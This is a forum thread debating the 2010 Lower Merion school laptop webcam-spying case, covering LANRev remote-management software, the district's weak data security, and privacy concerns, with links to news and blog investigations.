Read the frigging lawsuit. It talks about how clandestine and powerful this "spying" software is. I'm saying that nothing like this exists commercially, so that makes it even less likely that what they claim actually exists. In rebuttal I'm having people tell me, "Well, there's some software that does some of what is claimed. It's installed just like ordinary software, so anybody can see it."

ETA: Every bolded statement is shown false by my and other posts going back 3 pages. In case you missed it, here is every post with actual evidence refuting your stance:

http://forums.randi.org/showthread.php?postid=5632303#post5632303
http://forums.randi.org/showthread.php?postid=5635075#post5635075
http://forums.randi.org/showthread.php?postid=5635710#post5635710
http://forums.randi.org/showthread.php?postid=5638211#post5638211
http://forums.randi.org/showthread.php?postid=5638354#post5638354
http://forums.randi.org/showthread.php?postid=5639481#post5639481
http://forums.randi.org/showthread.php?postid=5639976#post5639976
http://forums.randi.org/showthread.php?postid=5640005#post5640005
http://forums.randi.org/showthread.php?postid=5640115#post5640115
http://forums.randi.org/showthread.php?postid=5640248#post5640248
http://forums.randi.org/showthread.php?postid=5641092#post5641092
http://forums.randi.org/showthread.php?postid=5641872#post5641872
http://forums.randi.org/showthread.php?postid=5644142#post5644142
http://forums.randi.org/showthread.php?postid=5645884#post5645884


Here's where I show you can do everything described in the lawsuit and do it surreptitiously:
http://forums.randi.org/showthread.php?postid=5640221#post5640221

Once more, with feeling, from GreNME:
http://forums.randi.org/showthread.php?postid=5641177#post5641177

So:

I'd say this is a resoundingly over-broad, and over-assertive stance on your part regarding the technical capabilities of software freely available "off the shelf."

In short, I think you were talking out of your rear end and it would be refreshing to see you retract such hyperbole.

<snip>

I'd say this is a resoundingly over-broad, and over-assertive stance on your part regarding the technical capabilities of software freely available "off the shelf."

In short, I think you were talking out of your rear end and it would be refreshing to see you retract such hyperbole.


I hope you're patient.

I hope you're not holding your breath.

------------

Regarding my 'tip of the iceberg' question, to re-quote from my last post...

Midgley confirmed that Lower Merion School District of Ardmore, Pa. was running Absolute Manage, formerly known as LANRev, which Absolute Software acquired last December. The suburban Philadelphia school district purchased and deployed LANRev prior to Absolute's acquisition, he said, noting that most school districts buy the software for power management features that let IT staff remotely power down systems.


Note the highlighted part, which kind of slips by when contemplating the more pressing concerns of this incident.

There's "more school districts" that may or may not have exhibited their own self-restraint with such opportunities at their fingertips. How many more? And that's just this one vendor.

My limitless faith in the basic integrity of humanity, and the boundless good sense of school administrators fills me with optimism that this is a unique occurrence.

:rolleyes:

I hope you're patient.

I hope you're not holding your breath.

------------

Regarding my 'tip of the iceberg' question, to re-quote from my last post...



Note the highlighted part, which kind of slips by when contemplating the more pressing concerns of this incident.

There's "more school districts" that may or may not have exhibited their own self-restraint with such opportunities at their fingertips. How many more? And that's just this one vendor.

My limitless faith in the basic integrity of humanity, and the boundless good sense of school administrators fills me with optimism that this is a unique occurrence.

:rolleyes:

The link I have for the software itself lists several school districts. I am sure there are many more.

Central management itself isn't a bad thing. Even central management that gives IT admins broad access to root powers over machines isn't necessarily bad if their job requires it. What's bad is that being abused by their non-IT superiors who don't have a job function need to do so and for reasons other than making the computer work and tracking the asset.

What's clear to me is that with a negative finding in this lawsuit (and I personally think the school district will be taken to task on this), most school districts will scramble to CYA. Whether that means massively changing how they manage assets in the field or whether they further obfuscate their attempts at more access and control is another matter for speculation.

I think what bothers me most is that I haven't read about any effective type of data protection for the students or the school :ie. whole disk encryption. PGP and Pointsec now both work on macs. With all this "protection of assets" arguments I've read defending the use of the webcam function, I have yet to see where data protection was actually implemented. It's a lot of control, but not a whole lot of prudent planning in event an asset is stolen. If they are relying on Apple's built in Filevault capabilities, that only protects the home directory of the users *if it is turned on* and by default isn't. Also, Filevault is full of weak encryption and allows for data leakage to other parts of the hard disk.

In some cases, I can see what someone's 'horse in the race' is. In this case, not so much.

A

Central management itself isn't a bad thing. Even central management that gives IT admins broad access to root powers over machines isn't necessarily bad if their job requires it. What's bad is that being abused by their non-IT superiors who don't have a job function need to do so and for reasons other than making the computer work and tracking the asset.

Not only is that considered abuse, but in cases of litigation IT staff who allow unauthorized co-workers or superiors risk being litigated themselves. One of the advantages I've had managing small-to-medium business IT is that I can flat-out tell a CEO or operations manager "no" when they ask for that kind of access, and they have little to threaten me with. I feel bad for those who work in larger companies and are pressured with reprisals that otherwise would be breaches in employee rights.

I think what bothers me most is that I haven't read about any effective type of data protection for the students or the school :ie. whole disk encryption. PGP and Pointsec now both work on macs. With all this "protection of assets" arguments I've read defending the use of the webcam function, I have yet to see where data protection was actually implemented. It's a lot of control, but not a whole lot of prudent planning in event an asset is stolen. If they are relying on Apple's built in Filevault capabilities, that only protects the home directory of the users *if it is turned on* and by default isn't. Also, Filevault is full of weak encryption and allows for data leakage to other parts of the hard disk.

Schools are the worst about employing encryption on their file systems. The few school systems I've had the opportunity to work with or take a look at "unofficially" (via associations with other professionals, nothing illegal), there's usually next to nothing as far as encryption on the back end, let alone the user end. This is usually due to piss-poor budgets, lack of administration attention to information security, and school boards who are more interested in bickering and politics than actually putting anything into infrastructure. The school systems who do manage to spend a bit of money tend to try to spend it on these central management systems as a silver bullet of sorts, and obviously that leaves them with less to spend on adequate staff to actually be effective. Some are so small that they call on consultants (like me) to come in and try to work with the little resources they have, or help their too-small staff try to complete a project that was sold to them as being able to solve all their problems but could have been assembled with cheaper or possibly even free components just as well, but would have likely been more difficult to provide point-click support or would have been a platform the on-site staff were unfamiliar with.

Not only is that considered abuse, but in cases of litigation IT staff who allow unauthorized co-workers or superiors risk being litigated themselves. One of the advantages I've had managing small-to-medium business IT is that I can flat-out tell a CEO or operations manager "no" when they ask for that kind of access, and they have little to threaten me with. I feel bad for those who work in larger companies and are pressured with reprisals that otherwise would be breaches in employee rights.

Agreed.

Schools are the worst about employing encryption on their file systems. The few school systems I've had the opportunity to work with or take a look at "unofficially" (via associations with other professionals, nothing illegal), there's usually next to nothing as far as encryption on the back end, let alone the user end. This is usually due to piss-poor budgets, lack of administration attention to information security, and school boards who are more interested in bickering and politics than actually putting anything into infrastructure. The school systems who do manage to spend a bit of money tend to try to spend it on these central management systems as a silver bullet of sorts, and obviously that leaves them with less to spend on adequate staff to actually be effective. Some are so small that they call on consultants (like me) to come in and try to work with the little resources they have, or help their too-small staff try to complete a project that was sold to them as being able to solve all their problems but could have been assembled with cheaper or possibly even free components just as well, but would have likely been more difficult to provide point-click support or would have been a platform the on-site staff were unfamiliar with.

Fundamentally this leads to the issue of liability for data loss. I'm not sure if students would be using sensitive data enough that identity theft is viable on event of data loss from theft, but certainly configuration files on the hard drive prevent a security issue should they leak (ie. LDAP maps, etc.) and I am surprised that by 2010 school administrators haven't learned what the corporate world has: remote administration + role based access + full disk encryption = reasonably low data leakage risk potential in event of asset loss. It's not just the student's homework they should care about (or, really, even bother to care about at all) it's the internal files in relation to their remote administration software and network configurations that could give a would-be intruder a good head start in penetrating the school's networks.

But then, maybe there isn't anything on the school's networks deemed sensitive enough. I would think employee and student files would be considered sensitive enough, however. Payroll information and social security numbers alone should warrant prudence in this matter.

Wish parents were more proactive when they receive equipment and read over the agreements should their child be provided something electronic from the schools their children attend. If not, take the damn laptop to a Geek Squad or someone who knows about computers to make sure there isn't anything that would impede on my family's privacy.

if a school requires my child to have a laptop, then they provide it, without a web cam attached. Otherwise, I will uninstall it, and make it not work any more. OR fashion a way to block the lens. My child , has no reason to use a web cam and if they need to take pictures or video, they can use the video camera that I have, that records to a solid state memory stick or a digital camera that does the same. That way its not attached to anything that can control it remotely.


The vice principal was wrong to spy on a child in the PRIVACY of his own home. He had no right comment on the behavior of said child, wHILE in the privacy of his own home. As long AS HE DID THE WORK he was to do in for school while at home, and BEHAVED and did the work required of him at school, his behavior at HOME has no bearing on his school life.

Fundamentally this leads to the issue of liability for data loss. I'm not sure if students would be using sensitive data enough that identity theft is viable on event of data loss from theft, but certainly configuration files on the hard drive prevent a security issue should they leak (ie. LDAP maps, etc.) and I am surprised that by 2010 school administrators haven't learned what the corporate world has: remote administration + role based access + full disk encryption = reasonably low data leakage risk potential in event of asset loss. It's not just the student's homework they should care about (or, really, even bother to care about at all) it's the internal files in relation to their remote administration software and network configurations that could give a would-be intruder a good head start in penetrating the school's networks.

Well, to be fair, I think a lot more schools now are making use of role-based access and at least have some level of administrative control over their desktop and projector computers. However, the laptops that would go to students are usually pretty sparse in terms of data that would need to be lost, and at least the couple of schools I've seen with wifi keep the student-accessible wifi off the same subnet as the staff systems (usually for net-nanny reasons). I wouldn't want to give the impression that school computer systems are still stuck in the 1980's. Late 1990's to mid-2000's, yes. Also, you're going to get better setups in larger school districts like Philly (or NY or Dallas etc.), but even there I'd be willing to bet that most of the servers are still running single-core chips and are either primarily Windows 2000-2003 or they've sprung for special appliances for specific tasks (like file storage, routing, and so on). Still closer to SMB (small-medium business) than to larger corporate setups, but they're usually not chugging along with a 486 server and in a workgroup environment (though I have seen some as recently as 4 years ago).

But then, maybe there isn't anything on the school's networks deemed sensitive enough. I would think employee and student files would be considered sensitive enough, however. Payroll information and social security numbers alone should warrant prudence in this matter.

The laptops tend to be pretty bare as far as useful data on them. However, it's conceivable that a sophisticated-enough criminal with enough tenacity could use a stolen laptop as a foot in the door to access more saucy data on the school network. Still, I doubt the school has these student laptops using LDAP authentication if the students are taking them home-- they're more likely insured for losses and breakage, with their network access limited to a segregated VLAN on the school's network for accessing their assignment data (when in school).

I'm pretty disappointed that there are members here who are asserting, without evidence, that the kid in the lawsuit is just faking it to hide their own activity.

And where exactly did that happen?

Right at the start of this story I said it might be more likely the case when we knew very little info.
It clearly seems less and less likely as more information comes out.

But nobody 'asserted without evidence' that this was the case. And nobody is doing so now.
So feel free to rail against a position that nobody here holds if you want to, but it seems a little pointless.

And where exactly did that happen?

Right at the start of this story I said it might be more likely the case when we knew very little info.
It clearly seems less and less likely as more information comes out.

But nobody 'asserted without evidence' that this was the case. And nobody is doing so now.
So feel free to rail against a position that nobody here holds if you want to, but it seems a little pointless.

Obviously Aerik believes we are all apologists for intrusive and oppressive spying.

One time in a chat room someone made some tasteless jokes and Aerik posted a long diatribe on the SGU forums about how we were apologists for rape. Even the people who weren't at their keyboard and didn't participate in the joking were apologists for rape for tacitly supporting the jokes by being connected.

I see his post as something similar to that incident.

Boing Boing article detailing the EFF and ACLU's responses:

http://www.boingboing.net/2010/02/23/aclu-and-eff-on-scho.html

referencing the following blog article:

http://blog.laptopmag.com/aclu-and-eff-speak-out-against-school-webcam-spying

I hope you're patient.

I hope you're not holding your breath.
Ditto. What a thorough smackdown. Not quite as powerful and entertaining as The Atheist in the pet thread, but, quite up there. \m/

http://techdirt.com/articles/20100222/1118438253.shtml

Quote:

Apparently, in various forums, blog posts and videos, one of the school's techies talked about the technology they were using and how to set it up so that the user would not realize they were being spied on. He also discussed how to prevent a laptop using this software from being "jailbroken," so users couldn't discover that their computers were being used in this manner. Other forum posts from students at the school show that they were told they could not use other computers, could not disable the cameras and could not jailbreak their laptops on the risk of expulsion.

http://strydehax.blogspot.com/2010/02/spy-at-harrington-high.html

This investigation into the remote spying allegedly being conducted against students at Lower Merion represents an attempt to find proof of spying and a look into the toolchain used to accomplish spying. Taking a look at the LMSD Staff List, Mike Perbix is listed as a Network Tech at LMSD. Mr. Perbix has a large online web forum footprint as well as a personal blog, and a lot of his posts, attributed to his role at Lower Merion, provide insight into the tools, methods, and capabilities deployed against students at LMSD. Of the three network techs employed at LMSD, Mr. Perbix appears to have been the mastermind behind a massive, highly effective digital panopticon.

The primary piece of evidence, already being reported on by a Fox affiliate, is this amazing promotional webcast for a remote monitoring product named LANRev. In it, Mike Perbix identifies himself as a high school network tech, and then speaks at length about using the track-and-monitor features of LanRev to take surreptitious remote pictures through a high school laptop webcam. A note of particular pride is evident in his voice when he talks about finding a way outside of LANRev to enable "curtain mode", a special remote administration mode that makes remote control of a laptop invisible to the victim.

Video link to the above:

http://www.youtube.com/watch?v=hHu92imqJec

Wow. This is pretty sinister sounding:

In a September 2009 post that may come to haunt this investigation, Perbix posted a scripting method for remote enable/disable of the iSight camera in the laptops. This post makes a lot more sense when Perbix puts it in context on an admin newsgroup, in a post which makes it clear that his script allows for the camera to appear shut down to user applications such as Photo Booth but still function via remote administration:

"what this does is prevent internal use of the iSight, but some utilities might still work (for instance an external application using it for Theft tracking"

What's the purpose of shutting down a camera for the user of the laptop but still making it available to network administrators? Ask yourself: if you wanted to convince someone that a webcam blinking was a glitch, would disabling the cameras help make your case?

Source for above is linked in previous post.

The blog entry shows him being able to disable the student from disabling his remote software:

http://bestsinceslicedbread.blogspot.com/2009_11_01_archive.html

Quote:

We were having an issue with LsSaAlerter application which is part of the Lightspeed systems Security Agent for OSX. the LsSaAlter application is responsible for the menu bar icon that shows you the status of the security agent and what it is currently doing. There is also a shortcut to get to the Lightspeed Preferences Pane by clicking on the menu icon.

There does not appear to be any current way via filtering policies to disable that menu and even if you MANUALLY go into the com.lightspeedsystems.securityagent.plist and set the "Enable Manger" key to false, it resets on next logout/login.

One student's post discusses how he found the way to exploit the administration's software to gain access to school records:

http://www.saveardmorecoalition.org/node/4216

This method will give you administrative control over your laptop, allowing you to access the consoles you were unable too during your demonstration, such as Terminal. Last year, to the chagrin of school officials, and to my own surprise, it also gave you unlimited access into the student records, including the ability to change grades on PowerSchool. I did not intend to access these files when I "Hacked" my laptop, merely to install a few games to pass the classes with (Senioritis.) This includes disabling the webcam.

Lastly, Bruce Schneier's blog on the subject:

http://www.schneier.com/blog/archives/2010/02/remotely_spying.html

Bruce also agrees with me that the link above is a good technical investigation of what happened.

http://strydehax.blogspot.com/2010/02/spy-at-harrington-high.html

Quote from the additions to the article doing an analysis of this situation:

My colleague Aaron pointed out to me today that the reason LANRev is using the raw camera device is that Apple implemented security measures to prevent remote activation of the webcam in OSX. LANRev was designed to bypass this security measure. Those who disagree with my spyware assessment, ask yourself, "what kind of software bypasses OS security measures?"

Wired has a good general article on the importance of privacy:

http://www.wired.com/politics/security/commentary/securitymatters/2006/05/70886

Too many wrongly characterize the debate as "security versus privacy." The real choice is liberty versus control. Tyranny, whether it arises under threat of foreign physical attack or under constant domestic authoritative scrutiny, is still tyranny. Liberty requires security without intrusion, security plus privacy. Widespread police surveillance is the very definition of a police state. And that's why we should champion privacy even when we have nothing to hide.

Thank you, Ducky. That was all very interesting stuff.

I hope UncaYimmy is going to contribute his technical expertise to help us interpret this new data.

Coming back to this, it really seems that school districts are trying to apply their behavioral strategies for student conduct to administration and support of hardware they are loaning out to the students. This is going to fail in several ways.

Firstly there's the problem of physical control. As I have linked above, intrepid students will easily circumvent the laptop's measures if desired. As shown the tech that seems to have designed the customizations to LANREV was a network tech that had he used the techniques he blogs about at my job would be considered less than competent. For example, he blogs about not wanting to hard code passwords in scripts (a good idea) but fails to understand that simply creating a hash of the password and comparing that hash is not sufficient security at all. He should be using the password as the key in a two part cryptographic design, because it's not any harder to cut and paste a hash as it is the raw password. Either way, physical control of the laptop is key. At some point they need to realize they are loaning a two thousand dollar laptop to a student and make clear the expectations of that student's use. This happens in the corporate world all the time, and if you think adults are any better about not googling for boobs on corporate laptops I'd say that thought is naive. One student responded with a way to hack the computers to gain access to school records. This shows that the school was not interested in actual information security or control, but interested in behavior control of the students and whatever spying gave them the illusion of control.

What they should have focused on were laptop policies to secure data such as whole disk encryption, remote/romaing profiles or user data backup to school servers and encrypted connections to the school network. Use outside of an end user agreement that fully discloses what's on the laptop, why it is in place, and what policies are there to protect data of the student and the school can be dealt with when the kid can't fix what he broke and brings it in to IT for fixes.

Other than that, there's no call for being able to remotely monitor the student's laptop even at school. On the school network, they should have web proxies on the server end that filters content and firewall/network rules to prevent the use of proxy circumvention. When the laptop is off site they need to accept they can't control what is going to be done with it, have reasonable protections in place and deal with the minor cases of laptop misuse as they come up.

If you don't want your laptops to be abused offsite, or you don't want data to leak out from missing laptops: don't give them out. For the money they spent on the laptops for each student, they could easily have installed desktops and given each student a roaming profile so that they have the same workspace when they log in to any computer at school, and if work from home is needed offer a web-based vpn solution such as Firepass that allows a student to log in to their desktop from home. If that student can't afford a computer, THEN you can consider a laptop loaner program as an exception.

My two cents. YMMV.

Either way, this school is learning hard lessons that were already learned in corporate america decades ago. At some point you have to trust the users you issue laptops to. That you are issuing them to kids doesn't change that, and doesn't excuse the lapse in security demonstrated by the incompetent tech or the draconian and intrusive spying done as security theater for the administration to abuse.

Great post Ducky.

<snip>

Either way, this school is learning hard lessons that were already learned in corporate america decades ago. At some point you have to trust the users you issue laptops to. That you are issuing them to kids doesn't change that, and doesn't excuse the lapse in security demonstrated by the incompetent tech or the draconian and intrusive spying done as security theater for the administration to abuse.


Good stuff, Ducky.

I expect we will hear much from the school system supporters about the alleged primary rationale for the use of this particular feature of the software by the school, theft prevention. As the suppliers of the software pointed out, the proper exercise of such an application would be in conjunction with law enforcement. If they had taken that approach this debacle never would have happened.

Great post Ducky.

Thanks Tyr. I'd be interested in GreNME's thoughts on that post, as he deals with user-end issues much more than I do.

This really seems like a mix of overzealous attempts at behavioral control by school staff mixed with pretty astoundingly incompetent hobbyist style hacks to spy on kids to achieve that. If I went into work and suggested what the school was doing for corporate laptops I would be rightly laughed out of the meeting. It boils down to being able to spy on the laptop with no real data security, and that's a recipe for abuse not only from school staff but from students and/or would be laptop thieves. Effective security should not also circumvent liberty. The two are not mutually exclusive.

All of that aside, there's no call for the school to ever be able to see into the student's bedroom. I can't even imagine a scenario where that's a good idea.

Good stuff, Ducky.

I expect we will hear much from the school system supporters about the alleged primary rationale for the use of this particular feature of the software by the school, theft prevention. As the suppliers of the software pointed out, the proper exercise of such an application would be in conjunction with law enforcement. If they had taken that approach this debacle never would have happened.

The lack of data security (ie: whole disk encryption) shows that their rationale is coming from completely incompetent ideas about security. In corporate america, we expect that when a laptop is stolen the data is encrypted and claim it as loss. If the school can't fund that kind of approach, then they should not let it off the grounds. Recovery rates for stolen laptops are abysmal.

The lack of data security (ie: whole disk encryption) shows that their rationale is coming from completely incompetent ideas about security. In corporate america, we expect that when a laptop is stolen the data is encrypted and claim it as loss. If the school can't fund that kind of approach, then they should not let it off the grounds. Recovery rates for stolen laptops are abysmal.


You know that. I know that. The IT people that the school had working for them probably knew that, and may very well have passed such wisdom on to clueless admin.

All true, but to date the primary (note my choice of words) alleged rationale put forth by the school in their defense has been, and has only been theft prevention. Discussions of the intricacies of password security and data encryption will not sell any papers, and would be lost on the audience even if presented, and the school has arlready been salting the mine with positive numbers about their recovery rates for stolen equipment. Valid or not they seem to be setting this up as their main line of defense in the theater of public opinion.

You know that. I know that. The IT people that the school had working for them probably knew that, and may very well have passed such wisdom on to clueless admin.

All true, but to date the primary (note my choice of words) alleged rationale put forth by the school in their defense has been, and has only been theft prevention. Discussions of the intricacies of password security and data encryption will not sell any papers, and would be lost on the audience even if presented, and the school has arlready been salting the mine with positive numbers about their recovery rates for stolen equipment. Valid or not they seem to be setting this up as their main line of defense in the theater of public opinion.

ETA: Agreed. It's going to be a piss poor excuse to those who actually know what they're talking about, though. The system just seems to be designed to enforce behavior and have the ability to spy on those not in step. That's pretty horrible. I can only hope the public is more outraged by the draconian 1984 attempt at control than swayed by the "OMG It's security! You have to give up privacy for that" crap we've been fed for 9 years.

Three things more effective than the laptop cam in security:

1) Disk encryption
2) internally installed GPS device for tracking
3) Network-enforced policies on software such as firewalls being on and screen-savers locking.


#2 is the only real way to know where your laptop is to recover it via help of the police. Snapping a picture isn't going to guarantee recovery.

ETA: Agreed. It's going to be a piss poor excuse to those who actually know what they're talking about, though. The system just seems to be designed to enforce behavior and have the ability to spy on those not in step. That's pretty horrible. I can only hope the public is more outraged by the draconian 1984 attempt at control than swayed by the "OMG It's security! You have to give up privacy for that" crap we've been fed for 9 years.

<snip>


Exactly!

I think a "good post, Ducky" would actually suffice, but since Ducky is interested in my thoughts from my perspective...

Coming back to this, it really seems that school districts are trying to apply their behavioral strategies for student conduct to administration and support of hardware they are loaning out to the students. This is going to fail in several ways.

Actually, it's going to fail in one simple way (through several avenues): human nature. You pretty accurately point out why.

Firstly there's the problem of physical control.

Firstly and lastly. It's a fairly universal truth that physical access to IT assets is the second-greatest security flaw (the first being users of IT assets).

At some point they need to realize they are loaning a two thousand dollar laptop to a student and make clear the expectations of that student's use. This happens in the corporate world all the time, and if you think adults are any better about not googling for boobs on corporate laptops I'd say that thought is naive. One student responded with a way to hack the computers to gain access to school records. This shows that the school was not interested in actual information security or control, but interested in behavior control of the students and whatever spying gave them the illusion of control.

While I have all sorts of colorful estimations as to why this wasn't obvious to the schools, I think it better to compare this to the same flaws in several government bureaucratic security systems (similar to what Ducky does), because they follow the same flawed approach. Intrusive doesn't equal secure in any sense of the word.

What they should have focused on were laptop policies to secure data such as whole disk encryption, remote/romaing profiles or user data backup to school servers and encrypted connections to the school network. Use outside of an end user agreement that fully discloses what's on the laptop, why it is in place, and what policies are there to protect data of the student and the school can be dealt with when the kid can't fix what he broke and brings it in to IT for fixes.

Honestly, even taking out whole disk encryption and user data backup would have been a night/day difference in terms of security. Sure, the disk encryption would protect the file system and user data backup would provide redundnacy, but remote or roaming profiles-- and, preferably, some form of directory services (group policies and Active Directory for Win-world, user scripts and LDAP for *nix-world)-- would have provided the simplest and most straight-forward security, and even more important is built into the operating systems (or the compatibility is built into what) they would use. I could understand a school system not wanting to invest in the disk real estate for user profile backups, and I can understand not wanting to invest in an effective (for the back-end and front-end) disk encryption as well, but both would definitely round out an effective security policy.

The trouble would be fixing problems when they arise (or when someone accidentally breaks them). For this, a competent IT staff would need to be in place, and on top of that an IT management person or group would have to make sure that standards were followed over the whole of the school staff's computers as well as any computers that the students were given (or had access to). I can't say whether pay was an issue or whether the school district in Philly just didn't have qualified candidates, but the chances that the schools had sufficient staff or budget to handle that is likely low.

Other than that, there's no call for being able to remotely monitor the student's laptop even at school. On the school network, they should have web proxies on the server end that filters content and firewall/network rules to prevent the use of proxy circumvention. When the laptop is off site they need to accept they can't control what is going to be done with it, have reasonable protections in place and deal with the minor cases of laptop misuse as they come up.

This is likely a management FUBAR, in my experience. Management tends to overestimate and under-budget, even in the corporate world.

If you don't want your laptops to be abused offsite, or you don't want data to leak out from missing laptops: don't give them out. For the money they spent on the laptops for each student, they could easily have installed desktops and given each student a roaming profile so that they have the same workspace when they log in to any computer at school, and if work from home is needed offer a web-based vpn solution such as Firepass that allows a student to log in to their desktop from home. If that student can't afford a computer, THEN you can consider a laptop loaner program as an exception.

Meh. An easier-to-manage situation would have been a terminal server access portal for students, or maybe even a web-based portal services system. Since student bodies are constantly advancing in grade levels and the users shifting by likely thousands in larger school systems, it would have been smarter to have a more centralized access system for student documents-- easier to manage, secure, and if the school wanted to, monitor.

Either way, this school is learning hard lessons that were already learned in corporate america decades ago. At some point you have to trust the users you issue laptops to. That you are issuing them to kids doesn't change that, and doesn't excuse the lapse in security demonstrated by the incompetent tech or the draconian and intrusive spying done as security theater for the administration to abuse.

Indeed. That the school system seems to not have followed any of the lessons learned by the corporate world isn't only odd, it's downright asinine in execution. Honestly, the parents and taxpayers into that school system should not only be demanding that heads roll (from a legal perspective), but also that the superintendent and school board completely re-work the school system's IT infrastructure.

WTF is your problem? I never said I didn't "understand how it could have possibly happened." I said the story is still not fitting together for me yet, especially in regards to the one image that is claimed to be evidence of spying. There can be any number of answers to the questions you asked, but they alone don't explain the story of the administrator and the image.

As for whether what happened is possible, I have contended from day one that the elaborate system described in the lawsuit was possible but very unlikely and that something far less sophisticated, however, would be easy.
So, in conclusion, my problem is with arrogant ignorance. I don't mind if someone is simply ignorant of something, they can be taught. I don't mind if someone is simply arrogant, so long at they are correct. But when someone is ignorant of a topic and insists that it could not be different from their uninformed opinion, that's just plain annoying.

So, doesn't someone come along now and talk about all their years in chicken ranching law enforcement and smack ol' Ducky down.

Nice to see solid skepticism in action. Good work from the Titanium PuprHero.


(*Apologies to The Band, but The Night They Smacked Ol' Ducky Down has a nice ring to it - not that "Drove Ol' Dixie Down" isn't already suggestive enough to cause serious snickering.)

So, doesn't someone come along now and talk about all their years in chicken ranching law enforcement and smack ol' Ducky down.

Nice to see solid skepticism in action. Good work from the Titanium PuprHero.


(*Apologies to The Band, but The Night They Smacked Ol' Ducky Down has a nice ring to it - not that "Drove Ol' Dixie Down" isn't already suggestive enough to cause serious snickering.)

I would love to hear from a law enforcement perspective on the school's actions given what we've discovered about the technical abilities and failings of the school administration and tech support. (ETA: Of course that would also involve making sure the law enforcement perspective understands what I've explained.) My perspective is simply that of a professional UNIX Admin.

And you totally copied REO Speedwagon.

The discussions of data security in a large network environment have been very enlightening and interesting, but I should like to note that it does not seem to be very important to the school system as far as this particular fiasco is concerned. I haven't seen anything in their statements which indicate a concern with the vulnerability of either their corporate data (school records) or the personal data of the students.

I'm not saying that they have no such concern, but they haven't been presenting data security as a justification for any of their behavior, only the physical recovery of hardware (laptops) removed without authorization.

I almost have to wonder if someone in admin, but not IT, noticed the remote viewing "security" feature of the network supervision package the school had selected and said to themselves "Hey, this is cool!" without contemplating the repercussions and without considering the actual lack of real benefits. It is interesting to note that the current publisher of that software package is intending to disable that feature. If such an intention was not prompted by this episode it might suggest that they had encountered similar issues in a less public venue.

The discussions of data security in a large network environment have been very enlightening and interesting, but I should like to note that it does not seem to be very important to the school system as far as this particular fiasco is concerned. I haven't seen anything in their statements which indicate a concern with the vulnerability of either their corporate data (school records) or the personal data of the students.

I'm not saying that they have no such concern, but they haven't been presenting data security as a justification for any of their behavior, only the physical recovery of hardware (laptops) removed without authorization.

I almost have to wonder if someone in admin, but not IT, noticed the remote viewing "security" feature of the network supervision package the school had selected and said to themselves "Hey, this is cool!" without contemplating the repercussions and without considering the actual lack of real benefits. It is interesting to note that the current publisher of that software package is intending to disable that feature. If such an intention was not prompted by this episode it might suggest that they had encountered similar issues in a less public venue.


While it's true physical recovery and data security are separate issues, they are to any IT professional very much intertwined. That they would consider one without the other to me seems to be gross incompetence at best. At worst it's a complete disregard for data security of their students and their own network in favor of focusing on the ability to spy on the hardware. What that functionally accomplishes is nothing but an excuse for abuse at the cost of actual security measures in terms of their laptops and their network. This is why the argument over recovering assets doesn't fly with me.

I would also be interested to know if the high percentage of recovered laptops were recoverable by standard investigative means (ie. the person who took it knew or was traceable back to the person it was taken from.) If that is indeed the case (and I should be careful to say I don't know, as they haven't disclosed that information) then their measures are nothing more than draconian spying justified with a very weak excuse.

In the real world recovering a stolen laptop is done by better means than snapping a picture. Most thieves will boot off a boot CD, dump the hard drive data off somewhere, load their own OS and sell the laptop. (That is, if the thief is even remotely intelligent, there are of course exceptions.) Even if they don't dump the data, it's not rocket science to think something will load that is traceable on an OS such as instant messenger clients, etc. This again is where encrypting the hard drive is important. No one is going to bother trying to crack encryption when there's 500-1000 bucks of quick cash to be made and another sucker with a laptop won't be as secure. By the numbers they'll get more personal data to farm for identity theft if they just sell the laptop and move on.

Recovery of a stolen laptop is far more effective if you're tracking something not dependent on the OS, like a GPS device that runs off the battery, but not limited to only running when the laptop is booted or even on. It also is better left to law enforcement than IT geeks and School administrators.

But of course, I'm no law enforcement expert.

WTF is your problem? I never said I didn't "understand how it could have possibly happened." I said the story is still not fitting together for me yet, especially in regards to the one image that is claimed to be evidence of spying. There can be any number of answers to the questions you asked, but they alone don't explain the story of the administrator and the image.

As for whether what happened is possible, I have contended from day one that the elaborate system described in the lawsuit was possible but very unlikely and that something far less sophisticated, however, would be easy.

I challenge you or anyone else to produce examples of off-the-shelf software that allows a central computer to surreptitiously track and control webcams on multiple computers. I'm tech savvy, and I'm telling you that I have never seen any off-the-shelf software that does what is described in the filing. I could write such a program, but that means that the school would have to pay for custom software.

Still waiting on your response to the information I have posted.

The discussions of data security in a large network environment have been very enlightening and interesting, but I should like to note that it does not seem to be very important to the school system as far as this particular fiasco is concerned. I haven't seen anything in their statements which indicate a concern with the vulnerability of either their corporate data (school records) or the personal data of the students.

I'm not saying that they have no such concern, but they haven't been presenting data security as a justification for any of their behavior, only the physical recovery of hardware (laptops) removed without authorization.

I almost have to wonder if someone in admin, but not IT, noticed the remote viewing "security" feature of the network supervision package the school had selected and said to themselves "Hey, this is cool!" without contemplating the repercussions and without considering the actual lack of real benefits. It is interesting to note that the current publisher of that software package is intending to disable that feature. If such an intention was not prompted by this episode it might suggest that they had encountered similar issues in a less public venue.

The reason Ducky has been going over the issue of data security with networked environments is because data security and asset recovery would be the only two reasons for doing what the school did in this case, and for both ends what was actually done would be completely and wholly inefficient (and, as Ducky states, draconian). The reason data security was foremost in Ducky's post was because that would be the real need that any IT security has to address above all else, particularly when it deals with equipment leaving the premises. As far as asset recovery possibilities, there would be little to no software that would make sense allowing school staff to essentially spy on the camera, as the main concern of an asset recovery system would instead focus on location awareness and recording/reporting data access attempts to sensitive information.

Since the capability that the school was making use of wouldn't have actually addressed either of those concerns, the main criticism that the school system and administrators should be required to answer is what was the purpose of having the capability in the first place?

Since the capability that the school was making use of wouldn't have actually addressed either of those concerns, the main criticism that the school system and administrators should be required to answer is what was the purpose of having the capability in the first place?

You obviously haven't heard of the Mike & Ike problem in today's schools. Kids are throwing back 'MI's', as they are called on the street, like they were some sort of candy.

Tasty, tasty candy.

The reason Ducky has been going over the issue of data security with networked environments is because data security and asset recovery would be the only two reasons for doing what the school did in this case, and for both ends what was actually done would be completely and wholly inefficient (and, as Ducky states, draconian). The reason data security was foremost in Ducky's post was because that would be the real need that any IT security has to address above all else, particularly when it deals with equipment leaving the premises. As far as asset recovery possibilities, there would be little to no software that would make sense allowing school staff to essentially spy on the camera, as the main concern of an asset recovery system would instead focus on location awareness and recording/reporting data access attempts to sensitive information.

Since the capability that the school was making use of wouldn't have actually addressed either of those concerns, the main criticism that the school system and administrators should be required to answer is what was the purpose of having the capability in the first place?


Yes, I agree. That was sort of my point. Maybe I didn't express myself well enough.

Yes, I agree. That was sort of my point. Maybe I didn't express myself well enough.

GreNME has a way of verbalizing technical topics that is much more concise than what I usually come up with.

